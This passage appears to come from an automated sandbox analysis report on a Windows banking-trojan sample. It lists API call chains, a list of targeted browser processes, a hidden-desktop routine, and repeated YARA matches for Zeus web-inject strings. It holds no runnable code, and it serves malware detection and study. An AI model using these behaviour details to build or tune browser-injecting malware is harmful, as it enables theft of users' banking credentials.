ion,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe31_2_01121900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_013078A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe33_2_01301900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,22_2_012E95B0

System Summary

Source: 2.3.svchost.exe.2700000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.Z8eHwAvqAh.exe.6184c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.Z8eHwAvqAh.exe.61d8c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
